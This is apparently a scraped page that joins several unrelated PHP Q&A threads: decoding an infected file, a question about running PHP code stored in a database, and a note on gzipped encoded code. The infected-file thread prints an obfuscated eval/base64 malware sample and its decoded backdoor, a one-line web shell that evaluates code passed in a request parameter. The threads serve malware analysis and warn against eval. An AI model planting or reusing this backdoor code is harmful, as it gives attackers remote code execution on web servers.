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'))); ?>

you can decode it using below urls:
1) http://www.tareeinternet.com/scripts/decrypt.php
2) http://ddecode.com/phpdecoder/
3) http://toolki.com/en/php-decoder/
4) http://www.unphp.net/

There really isn't a way to "un-minify" i think - especially when all of the variables and functions are reduced to numbers.

Eval PHP Hack Cannot decode code

I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>

If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.

It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...

pulling and outputing php tags from a database

I am trying to create a dynamic FAQ page. I have the following phtml sample :
<div id="faq">
<!-- Start FAQ "Navigation" -->
<div class="faqBox">
<? foreach($this->aFAQ as $k => $val) : ?>
<?= ($val['mQuestion']); ?>
<?= ($val['mAnswer']); ?>
<? endforeach; ?>
</div>
</div>
Which outputs as follows:
For additional payment options - check or money order, please contact us at iBrandingLevel == 2 ? $this->oStore->getSuppPhone()." Monday to Friday ".$this->oStore->getSuppHoursOpen()." - ".$this->oStore->getSuppHoursClose()." ".$this->oStore->getSuppTimeZone() : "(888) 455-3237 x2 from Monday to Friday 8:00am - 4:30pm MST/Arizona."; ?>
The above text is just the first $val['mAnswer'] (I didnt include the question as that is working properly).
The html is being rendered however obvoiusly the php isn't. the <? and ?> are being removed and just code is displaying. Is there a fix for this? or is my approach fundamentally wrong.
thanks

Your approach is fundamentally wrong, you are outputting PHP code as if it was HTML text and try to execute it.
It is possible to execute code from a string, you can look at the Eval method (http://php.net/manual/fr/function.eval.php) in PHP, but it is not recommended to do this. There are better ways to resolve your specific issues than to output PHP code directly.
What you could do is send a few variables to the view, and use if conditions there.
You could also prepare the full string you need before the view and then all that would be needed is to display it.
To elaborate a little about Eval :
1- If the code you execute within the Eval comes from a user, it is extremely dangerous.
2- If not, there is very often a better solution to the problem, using Eval makes it harder to debug.

Actually, I'm not sure I should answer this.
First, the answer to your request is the mixed eval ( string $code ) php function.
Second, FORGET IT. IMHO, this could be one of the most dangerous things you could think in.

Thanks everybody for the input and resulting discourse. The php code that was being stored in the database was not being input by users, it was all completely internal, however it still shouldn't be there.
I ultimately went through the database and set a %%variablename%% in place of the php code and then upon retrieval I wrote a script that would:
preg_replace("/\%\%variablename\%\%/", $desiredPhpcode, dbRetrievedString).
all instances of %%variablename%%.
It seemed the safer and more sound approach. I don't know if this is an IDEAL approach that anybody else could benefit from if caught in this circumstance or if it 'just works', but I thought I would share.
Thanks Again for the input it helped enormously

PHP is server-side language. Outputting it to client does not make any sense, as there is no one to interpret it.

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.

Decode an Encrypted PHP File Assistance - php

The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious. Replace eval with echo and see what it gives you, that's what the code that is trying to run is.

Related

json decode use variable as selector in php

How to evaluate this string

How to decompress PHP script from GZIP?

Eval PHP Hack Cannot decode code

pulling and outputing php tags from a database

Categories

Resources